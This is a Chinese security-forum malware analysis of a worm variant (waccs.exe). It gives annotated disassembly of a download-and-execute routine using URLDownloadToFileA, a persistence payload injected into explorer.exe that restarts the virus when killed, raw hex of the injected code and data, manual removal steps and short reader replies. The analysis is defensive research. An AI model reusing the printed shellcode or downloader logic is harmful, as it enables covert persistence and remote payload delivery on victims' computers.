00404D56 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404D5C 50 PUSH EAX 00404D5D E8 D8220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D62 83C4 0C ADD ESP,0C 00404D65 68 04010000 PUSH 104 00404D6A 6A 00 PUSH 0 00404D6C 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404D72 50 PUSH EAX 00404D73 E8 C2220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D78 83C4 0C ADD ESP,0C 00404D7B 68 04010000 PUSH 104 00404D80 6A 00 PUSH 0 00404D82 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404D88 50 PUSH EAX 00404D89 E8 AC220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404D8E 83C4 0C ADD ESP,0C 00404D91 68 90010000 PUSH 190 00404D96 6A 00 PUSH 0 00404D98 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198] 00404D9E 50 PUSH EAX 00404D9F E8 96220000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00404DA4 83C4 0C ADD ESP,0C 00404DA7 83A5 20E8FFFF 0>AND DWORD PTR SS:[EBP-17E0],0 00404DAE 83A5 30E8FFFF 0>AND DWORD PTR SS:[EBP-17D0],0 00404DB5 83A5 F8EFFFFF 0>AND DWORD PTR SS:[EBP-1008],0 00404DBC 6A 00 PUSH 0 00404DBE 6A 00 PUSH 0 00404DC0 6A 00 PUSH 0 00404DC2 6A 00 PUSH 0 00404DC4 68 40084B19 PUSH 194B0840 00404DC9 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904] 00404DCF E8 A5040000 CALL waccs.00405279 00404DD4 50 PUSH EAX 00404DD5 FF15 B4814000 CALL DWORD PTR DS:[4081B4] ; WININET.InternetOpenA 00404DDB 8985 20E8FFFF MOV DWORD PTR SS:[EBP-17E0],EAX 00404DE1 8D8D FCE6FFFF LEA ECX,DWORD PTR SS:[EBP-1904] 00404DE7 E8 C2D1FFFF CALL waccs.00401FAE 00404DEC 83BD 20E8FFFF 0>CMP DWORD PTR SS:[EBP-17E0],0 00404DF3 75 05 JNZ SHORT waccs.00404DFA 00404DF5 E8 AE220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404DFA 6A 00 PUSH 0 00404DFC 6A 00 PUSH 0 00404DFE 6A 00 PUSH 0 00404E00 6A 00 PUSH 0 00404E02 8D85 49EBFFFF LEA EAX,DWORD PTR SS:[EBP-14B7] 00404E08 50 PUSH EAX 00404E09 FFB5 20E8FFFF PUSH DWORD PTR SS:[EBP-17E0] 00404E0F FF15 B8814000 CALL DWORD PTR DS:[4081B8] ; WININET.InternetOpenUrlA 00404E15 8985 30E8FFFF MOV DWORD PTR SS:[EBP-17D0],EAX 00404E1B 83BD 30E8FFFF 0>CMP DWORD PTR SS:[EBP-17D0],0 00404E22 75 05 JNZ SHORT waccs.00404E29 00404E24 E8 7F220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404E29 8D85 F8EFFFFF LEA EAX,DWORD PTR SS:[EBP-1008] 00404E2F 50 PUSH EAX 00404E30 68 00100000 PUSH 1000 00404E35 8D85 FCEFFFFF LEA EAX,DWORD PTR SS:[EBP-1004] 00404E3B 50 PUSH EAX 00404E3C FFB5 30E8FFFF PUSH DWORD PTR SS:[EBP-17D0] 00404E42 FF15 BC814000 CALL DWORD PTR DS:[4081BC] ; WININET.InternetReadFile 00404E48 85C0 TEST EAX,EAX 00404E4A 75 05 JNZ SHORT waccs.00404E51 00404E4C E8 57220000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404E51 83A5 18E7FFFF 0>AND DWORD PTR SS:[EBP-18E8],0 00404E58 68 DA43FADE PUSH DEFA43DA 00404E5D 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C] 00404E63 E8 71040000 CALL waccs.004052D9 00404E68 50 PUSH EAX 00404E69 FFB5 60EDFFFF PUSH DWORD PTR SS:[EBP-12A0] 00404E6F E8 DE210000 CALL waccs.00407052 ; JMP 到 msvcrt.strstr 00404E74 59 POP ECX 00404E75 59 POP ECX 00404E76 8985 34E8FFFF MOV DWORD PTR SS:[EBP-17CC],EAX 00404E7C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404E82 8985 F8E6FFFF MOV DWORD PTR SS:[EBP-1908],EAX 00404E88 8D8D F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C] 00404E8E E8 36030000 CALL waccs.004051C9 00404E93 83BD F8E6FFFF 0>CMP DWORD PTR SS:[EBP-1908],0 00404E9A 74 38 JE SHORT waccs.00404ED4 00404E9C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404EA2 8020 00 AND BYTE PTR DS:[EAX],0 00404EA5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8] 00404EAB 8B8D 60EDFFFF MOV ECX,DWORD PTR SS:[EBP-12A0] 00404EB1 898C85 68EEFFFF MOV DWORD PTR SS:[EBP+EAX4-1198],ECX 00404EB8 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404EBE 40 INC EAX 00404EBF 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX 00404EC5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8] 00404ECB 40 INC EAX 00404ECC 8985 18E7FFFF MOV DWORD PTR SS:[EBP-18E8],EAX 00404ED2 ^ EB 84 JMP SHORT waccs.00404E58 00404ED4 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404EDA 50 PUSH EAX 00404EDB 68 04010000 PUSH 104 00404EE0 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA 00404EE6 8D85 45EAFFFF LEA EAX,DWORD PTR SS:[EBP-15BB] 00404EEC 50 PUSH EAX 00404EED 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404EF3 50 PUSH EAX 00404EF4 68 23B863A8 PUSH A863B823 00404EF9 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914] 00404EFF E8 35040000 CALL waccs.00405339 00404F04 50 PUSH EAX 00404F05 68 04010000 PUSH 104 00404F0A 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F10 50 PUSH EAX 00404F11 E8 2A210000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00404F16 83C4 14 ADD ESP,14 00404F19 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914] 00404F1F E8 02D1FFFF CALL waccs.00402026 00404F24 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F2A 50 PUSH EAX 00404F2B E8 BFF0FFFF CALL waccs.00403FEF 00404F30 59 POP ECX 00404F31 0FB6C0 MOVZX EAX,AL 00404F34 85C0 TEST EAX,EAX 00404F36 74 0D JE SHORT waccs.00404F45 00404F38 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F3E 50 PUSH EAX 00404F3F FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA 00404F45 0FBE85 3DE8FFFF MOVSX EAX,BYTE PTR SS:[EBP-17C3] 00404F4C 85C0 TEST EAX,EAX 00404F4E 0F84 B5000000 JE waccs.00405009 00404F54 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00404F5A 50 PUSH EAX 00404F5B E8 EC200000 CALL waccs.0040704C ; JMP 到 msvcrt.srand 00404F60 59 POP ECX 00404F61 E8 E0200000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00404F66 99 CDQ 00404F67 6A 09 PUSH 9 00404F69 59 POP ECX 00404F6A F7F9 IDIV ECX 00404F6C 52 PUSH EDX 00404F6D E8 D4200000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00404F72 99 CDQ 00404F73 6A 09 PUSH 9 00404F75 59 POP ECX 00404F76 F7F9 IDIV ECX 00404F78 52 PUSH EDX 00404F79 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404F7F 50 PUSH EAX 00404F80 68 EADFCD01 PUSH 1CDDFEA 00404F85 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920] 00404F8B E8 09040000 CALL waccs.00405399 00404F90 50 PUSH EAX 00404F91 68 04010000 PUSH 104 00404F96 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404F9C 50 PUSH EAX 00404F9D E8 9E200000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00404FA2 83C4 18 ADD ESP,18 00404FA5 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920] 00404FAB E8 C6D0FFFF CALL waccs.00402076 00404FB0 6A 00 PUSH 0 00404FB2 6A 00 PUSH 0 00404FB4 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404FBA 50 PUSH EAX 00404FBB 8D85 3DE8FFFF LEA EAX,DWORD PTR SS:[EBP-17C3] 00404FC1 50 PUSH EAX 00404FC2 6A 00 PUSH 0 00404FC4 E8 EB210000 CALL waccs.004071B4 ; JMP 到 urlmon.URLDownloadToFileA 00404FC9 8985 24E8FFFF MOV DWORD PTR SS:[EBP-17DC],EAX 00404FCF 83BD 24E8FFFF 0>CMP DWORD PTR SS:[EBP-17DC],0 00404FD6 74 05 JE SHORT waccs.00404FDD 00404FD8 E8 CB200000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404FDD 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF] 00404FE3 50 PUSH EAX 00404FE4 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404FEA 50 PUSH EAX 00404FEB 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404FF1 50 PUSH EAX 00404FF2 E8 181B0000 CALL waccs.00406B0F 00404FF7 83C4 0C ADD ESP,0C 00404FFA 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405000 50 PUSH EAX 00405001 FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA 00405007 EB 38 JMP SHORT waccs.00405041 00405009 68 04010000 PUSH 104 0040500E 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405014 50 PUSH EAX 00405015 6A 00 PUSH 0 00405017 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA 0040501D 50 PUSH EAX 0040501E FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA 00405024 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF] 0040502A 50 PUSH EAX 0040502B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405031 50 PUSH EAX 00405032 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405038 50 PUSH EAX 00405039 E8 D11A0000 CALL waccs.00406B0F 0040503E 83C4 0C ADD ESP,0C 00405041 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405047 50 PUSH EAX 00405048 E8 A2EFFFFF CALL waccs.00403FEF 0040504D 59 POP ECX 0040504E 0FB6C0 MOVZX EAX,AL 00405051 85C0 TEST EAX,EAX 00405053 75 05 JNZ SHORT waccs.0040505A 00405055 E8 4E200000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 0040505A FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00405060 8985 38E8FFFF MOV DWORD PTR SS:[EBP-17C8],EAX 00405066 8B85 50ECFFFF MOV EAX,DWORD PTR SS:[EBP-13B0] 0040506C 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040506F EB 07 JMP SHORT waccs.00405078 00405071 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00405074 48 DEC EAX 00405075 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00405078 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 0040507C 7E 38 JLE SHORT waccs.004050B6 0040507E FFB5 18E7FFFF PUSH DWORD PTR SS:[EBP-18E8] 00405084 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198] 0040508A 50 PUSH EAX 0040508B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405091 50 PUSH EAX 00405092 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8] 00405098 E8 ECF8FFFF CALL waccs.00404989 0040509D 83C4 10 ADD ESP,10 004050A0 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004050A3 48 DEC EAX 004050A4 85C0 TEST EAX,EAX 004050A6 7E 0C JLE SHORT waccs.004050B4 004050A8 FFB5 54ECFFFF PUSH DWORD PTR SS:[EBP-13AC] 004050AE FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep 004050B4 ^ EB BB JMP SHORT waccs.00405071 004050B6 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 004050BC 8985 2CE8FFFF MOV DWORD PTR SS:[EBP-17D4],EAX 004050C2 8B85 2CE8FFFF MOV EAX,DWORD PTR SS:[EBP-17D4] 004050C8 2B85 38E8FFFF SUB EAX,DWORD PTR SS:[EBP-17C8] 004050CE 99 CDQ 004050CF B9 60EA0000 MOV ECX,0EA60 004050D4 F7F9 IDIV ECX 004050D6 50 PUSH EAX 004050D7 FFB5 50ECFFFF PUSH DWORD PTR SS:[EBP-13B0] 004050DD 68 449F4000 PUSH waccs.00409F44 004050E2 68 489F4000 PUSH waccs.00409F48 004050E7 8B85 58ECFFFF MOV EAX,DWORD PTR SS:[EBP-13A8] 004050ED 05 D3000000 ADD EAX,0D3 004050F2 50 PUSH EAX 004050F3 68 26E784BB PUSH BB84E726 004050F8 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C] 004050FE E8 F6020000 CALL waccs.004053F9 00405103 50 PUSH EAX 00405104 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8] 0040510A E8 F1BEFFFF CALL waccs.00401000 0040510F 83C4 1C ADD ESP,1C 00405112 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C] 00405118 E8 D4000000 CALL waccs.004051F1 0040511D E8 861F0000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00405122 5F POP EDI 00405123 5E POP ESI 00405124 C9 LEAVE 00405125 C3 RETN ; 返回. ---------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ---------------------------------------------------------- 3、对病毒注入到系统桌面程序“explorer.exe”进程中的恶意代码进行分析：注入的代码段： [进程守护功能：循环执行检测代码，根据互斥体名称判断病毒主程序是否在运行，如果发现病毒主程序互斥体名称不存在(进程被关闭)，则马上重新调用病毒程序启动运行.] 01A50000 55 PUSH EBP ; 注入代码的入口. 01A50001 8BEC MOV EBP,ESP 01A50003 83EC 08 SUB ESP,8 01A50006 6A 00 PUSH 0 ; /hTemplateFile = NULL 01A50008 68 80000000 PUSH 80 ; \|Attributes = NORMAL 01A5000D 6A 03 PUSH 3 ; \|Mode = OPEN_EXISTING 01A5000F 6A 00 PUSH 0 ; \|pSecurity = NULL 01A50011 6A 01 PUSH 1 ; \|ShareMode = FILE_SHARE_READ 01A50013 68 00000080 PUSH 80000000 ; \|Access = GENERIC_READ 01A50018 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A5001B 83C0 1C ADD EAX,1C 01A5001E 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe" 01A5001F 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 01A50022 FF51 04 CALL DWORD PTR DS:[ECX+4] ; kernel32.CreateFileA(以共享读的方式打开病毒主程序文件，防止被用户或安全软件删除). 01A50025 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 01A50028 BA 01000000 MOV EDX,1 01A5002D 85D2 TEST EDX,EDX ; 判断函数返回值. 01A5002F 74 72 JE SHORT 01A500A3 ; 如果文件不存在，则跳出. 01A50031 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A50034 05 20010000 ADD EAX,120 01A50039 50 PUSH EAX ; /MutexName = "t3x0" 01A5003A 6A 00 PUSH 0 ; \|InitialOwner = FALSE 01A5003C 6A 00 PUSH 0 ; \|pSecurity = NULL 01A5003E 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 01A50041 FF51 08 CALL DWORD PTR DS:[ECX+8] ; kernel32.CreateMutexA 01A50044 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 01A50047 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 01A5004A FF52 0C CALL DWORD PTR DS:[EDX+C] ; ntdll.RtlGetLastWin32Error 01A5004D 3D B7000000 CMP EAX,0B7 01A50052 74 2F JE SHORT 01A50083 ; 判断病毒进程是否在还运行. 01A50054 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] ; 如果发现病毒进程不存在了，就从这里开始执行. 01A50057 50 PUSH EAX 01A50058 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 019B005B FF11 CALL DWORD PTR DS:[ECX] ; kernel32.CloseHandle(关闭句柄). 01A5005D 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 01A50060 52 PUSH EDX 01A50061 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 019B0064 FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 01A50067 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 01A5006A 51 PUSH ECX 01A5006B 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 019B006E FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle(关闭句柄). 01A50070 6A 00 PUSH 0 01A50072 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A50075 83C0 1C ADD EAX,1C 01A50078 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe" 01A50079 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 019B007C FF51 18 CALL DWORD PTR DS:[ECX+18] ; kernel32.WinExec(重新调用病毒程序启动运行). 01A5007F 33C0 XOR EAX,EAX 01A50081 EB 22 JMP SHORT 01A500A5 ; 跳出循环. 01A50083 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 01A50086 52 PUSH EDX 01A50087 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A5008A FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 01A5008D 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 01A50090 51 PUSH ECX 01A50091 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 01690094 FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle(关闭句柄). 01A50096 68 10270000 PUSH 2710 01A5009B 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0169009E FF50 14 CALL DWORD PTR DS:[EAX+14] ; kernel32.Sleep(等待). 01A500A1 ^ EB 85 JMP SHORT 01A50028 ; 循环执行这段检测代码. 01A500A3 33C0 XOR EAX,EAX 01A500A5 8BE5 MOV ESP,EBP 01A500A7 5D POP EBP 01A500A8 C2 0400 RETN 4 ; 返回(退出). 注入的数据段： 0012F550 47 9B 80 7C 24 1A 80 7C G泙\|$€\| 0012F558 3F E9 80 7C 31 03 93 7C ?閫\|1搢 0012F560 A7 24 80 7C 42 24 80 7C ?€\|B$€\| 0012F568 6D 13 86 7C 43 3A 5C 57 m唡C:\W 0012F570 49 4E 44 4F 57 53 5C 73 INDOWS\s 0012F578 79 73 74 65 6D 33 32 5C ystem32\ 0012F580 77 61 63 63 73 2E 65 78 waccs.ex 0012F588 65 00 00 00 00 00 00 00 e....... 0012F590 00 00 00 00 00 00 00 00 ........ 0012F598 00 00 00 00 00 00 00 00 ........ 0012F5A0 00 00 00 00 00 00 00 00 ........ 0012F5A8 00 00 00 00 00 00 00 00 ........ 0012F5B0 00 00 00 00 00 00 00 00 ........ 0012F5B8 00 00 00 00 00 00 00 00 ........ 0012F5C0 00 00 00 00 00 00 00 00 ........ 0012F5C8 00 00 00 00 00 00 00 00 ........ 0012F5D0 00 00 00 00 00 00 00 00 ........ 0012F5D8 00 00 00 00 00 00 00 00 ........ 0012F5E0 00 00 00 00 00 00 00 00 ........ 0012F5E8 00 00 00 00 00 00 00 00 ........ 0012F5F0 00 00 00 00 00 00 00 00 ........ 0012F5F8 00 00 00 00 00 00 00 00 ........ 0012F600 00 00 00 00 00 00 00 00 ........ 0012F608 00 00 00 00 00 00 00 00 ........ 0012F610 00 00 00 00 00 00 00 00 ........ 0012F618 00 00 00 00 00 00 00 00 ........ 0012F620 00 00 00 00 00 00 00 00 ........ 0012F628 00 00 00 00 00 00 00 00 ........ 0012F630 00 00 00 00 00 00 00 00 ........ 0012F638 00 00 00 00 00 00 00 00 ........ 0012F640 00 00 00 00 00 00 00 00 ........ 0012F648 00 00 00 00 00 00 00 00 ........ 0012F650 00 00 00 00 00 00 00 00 ........ 0012F658 00 00 00 00 00 00 00 00 ........ 0012F660 00 00 00 00 00 00 00 00 ........ 0012F668 00 00 00 00 00 00 00 00 ........ 0012F670 74 33 78 30 00 00 00 00 t3x0.... 0012F678 00 00 00 00 00 00 00 00 ........ 0012F680 00 00 00 00 00 00 00 00 ........ 0012F688 00 00 00 00 00 00 00 00 ........ 0012F690 00 00 00 00 00 00 00 00 ........ 0012F698 00 00 00 00 00 00 00 00 ........ 0012F6A0 00 00 00 00 00 00 00 00 ........ 0012F6A8 00 00 00 00 00 00 00 00 ........ 0012F6B0 00 . ---------------------------------------------------------- 注入的数据段： 47 9B 80 7C 24 1A 80 7C 3F E9 80 7C 31 03 93 7C A7 24 80 7C 42 24 80 7C 6D 13 86 7C 43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65 6D 33 32 5C 77 61 63 63 73 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 33 78 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 注入的代码段： 55 8B EC 83 EC 08 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 04 89 45 F8 BA 01 00 00 00 85 D2 74 72 8B 45 08 05 20 01 00 00 50 6A 00 6A 00 8B 4D 08 FF 51 08 89 45 FC 8B 55 08 FF 52 0C 3D B7 00 00 00 74 2F 8B 45 F8 50 8B 4D 08 FF 11 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 6A 00 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 18 33 C0 EB 22 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 68 10 27 00 00 8B 45 08 FF 50 14 EB 85 33 C0 8B E5 5D C2 04 00 55 ---------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ************************************************************************************************** 三、手动杀毒方法步骤(在系统真实环境下测试有效)： 1：终止关闭掉病毒保护进程“explorer.exe”(系统桌面程序)。 2：结束掉病毒进程“C:\windows\system32\waccs.exe”。 3：删除掉病毒程序文件“C:\windows\system32\waccs.exe”。 4：重新启动运行系统桌面程序“C:\windows\explorer.exe”，查杀病毒完毕。 ************************************************************************************************** //////////////////////////////////////////////////////////////////////////////////////////////////// 2008-6-13 21:43 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 3 楼上传个“蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)”文本文档，方便下载。由于时间紧，只是大概分析了下，难免有错误的地方，请指正，谢谢！上传的附件： ReadMe.rar （36.09kb，21次下载） 2008-6-13 22:36 0
frozenrain 雪币： 107 活跃值： (1693) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 509 粉丝 1 关注私信	frozenrain 4 楼病毒分析的要加精哈 2008-6-13 22:48 0
qy黄文超雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 33 回帖 155 粉丝 0 关注私信	qy黄文超 5 楼太棒了！！！希望楼主把样本传上来！！ 2008-6-13 22:48 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 56 关注私信	combojiang 26 6 楼呵呵，好长的文章啊，辛苦了。 2008-6-13 22:52 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 7 楼您好啊，呵呵。居然还去了偶的博客留言，谢谢关注，呵呵。这么晚还没休息？ 2008-6-13 23:03 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 8 楼我也喜欢“加精”，呵呵。谢谢支持。 2008-6-13 23:06 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 9 楼好的。但得先请示下坛主或他们，他们同意上穿病毒我再传，不然不太好。 2008-6-13 23:09 0
jskew 雪币： 124 活跃值： (70) 能力值： ( LV4，RANK：50 ) 在线值：发帖 30 回帖 352 粉丝 0 关注私信	jskew 1 10 楼需要样本 2008-6-13 23:41 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 11 楼慢慢顶，呵呵。斑竹说同意，我就发。 2008-6-14 00:00 0
lonkil 雪币： 244 活跃值： (69) 能力值： ( LV4，RANK：50 ) 在线值：发帖 5 回帖 113 粉丝 0 关注私信	lonkil 1 12 楼兄弟，果然强悍，学习了。 2008-6-14 01:06 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 13 楼太长不利于阅读,其实你贴这么多汇编代码...谁会去看...? 还不如自己去分析了.. 2008-6-14 01:08 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 14 楼是啊，我写着也很累的，呵呵！不过，既然都大概标注了，所以就都发上来了。。。。。 2008-6-14 09:23 0
七号雪币： 199 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 89 粉丝 0 关注私信	七号 15 楼强悍。。。。 2008-6-14 10:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

coderui

发帖

188

回帖

120

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (14)
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 2 楼 ---------------------------------------------------------------------------------------------------- 2、当样本执行恶意操作时的分析： 00402D14 FF15 88804000 CALL DWORD PTR DS:[408088] ; ntdll.RtlGetLastWin32Error(如果s2 == s1,则该病毒程序从这里开始执行恶意操作.) 00402D1A 3D B7000000 CMP EAX,0B7 ; EAX = 0x51D 00402D1F 75 08 JNZ SHORT waccs.00402D29 ; 条件判断. 00402D21 6A 00 PUSH 0 00402D23 FF15 84804000 CALL DWORD PTR DS:[408084] ; kernel32.ExitProcess(不满足条件则关闭退出). 00402D29 8D85 54FCFFFF LEA EAX,DWORD PTR SS:[EBP-3AC] 00402D2F 50 PUSH EAX ; /pWSAData = 0012FC14 00402D30 68 02020000 PUSH 202 ; \|RequestedVersion = 202 (2.2.) 00402D35 FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 2.0). 00402D3B 85C0 TEST EAX,EAX ; 判断是否定义成功. 00402D3D 74 1E JE SHORT waccs.00402D5D ; 如果失败则执行下边代码，定义协议WinSock 1.0. 00402D3F 8D85 54FCFFFF LEA EAX,DWORD PTR SS:[EBP-3AC] 00402D45 50 PUSH EAX 00402D46 68 01010000 PUSH 101 00402D4B FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 1.0). 00402D51 85C0 TEST EAX,EAX ; 判断是否定义成功. 00402D53 74 08 JE SHORT waccs.00402D5D ; 如果失败则执行下边代码,关闭退出. 00402D55 6A 01 PUSH 1 00402D57 FF15 84804000 CALL 